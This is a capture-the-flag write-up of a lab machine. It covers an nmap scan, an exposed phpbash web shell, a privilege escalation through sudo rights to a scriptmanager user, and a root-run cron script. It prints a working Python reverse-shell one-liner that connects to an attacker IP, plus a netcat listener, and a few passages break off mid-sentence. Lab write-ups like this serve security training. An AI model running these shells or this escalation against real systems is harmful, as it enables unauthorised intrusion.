┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 1000 -p- 10.10.10.68 Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-20 11:38 EST Nmap scan report for 10.10.10.68 Host is up (0.052s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 17.34 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sC -sV -p80 10.10.10.68 Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-20 11:40 EST Nmap scan report for 10.10.10.68 Host is up (0.053s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Arrexel's Development Site |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
Only port 80 open so let's check that website.
Well the webpage looks like a blog and it only has one article speaking about a tool called
phpbash. This tool provides a semi-interactive web shell to the machine and according to the author article, he developed it in the same server that is hosting the page.
The article contains an image that looks like reveals the location of the tool in the
/uploads directory but it is not there. Since the author said that he developed it, I tried to check something like a
/dev directory and it worked! This directory not only has directory listing enabled, it contains the
Getting a reverse shell
After some try and error, I was able to get a python reverse shell using:
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.10.14.40",8000));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
Now we can just upgrade it to a full
tty. The user flag is under
Once in the machine, I tried some basic enumeration commands and this is interesting:
www-data@bashed:/home/arrexel$ sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data can execute commands as
scriptmanager without password so we can just execute bash as that user to impersonate it:
www-data@bashed:/home/arrexel$ sudo -u scriptmanager bash -p scriptmanager@bashed:/home/arrexel$
I decided to look for all the files owned by this user with:
scriptmanager@bashed:/scripts$ find / -user scriptmanager 2> /dev/null /scripts /scripts/test.py /home/scriptmanager /home/scriptmanager/.profile /home/scriptmanager/.bashrc /home/scriptmanager/.nano /home/scriptmanager/.bash_history /home/scriptmanager/.bash_logout /proc/10983 /proc/10983/task ...REDACTED...
scripts folder looks promising, it contains a Python script and also a file owned by
test.txt. Checking the script looks like that
txt file is the output of the code.
Looks like there is a
cron job executing the script as
root because the file creation date is updated every minute or so. Since we can change the script we could get a reverse shell as the
root user changing the script content to this:
Now it is time to spin up a listener and wait...
┌──(kali㉿kali)-[~] └─$ nc -lnvp 8080 listening on [any] 8080 ... connect to [10.10.14.40] from (UNKNOWN) [10.10.10.68] 42738 # id id uid=0(root) gid=0(root) groups=0(root)
And we got a
root shell! The flag is under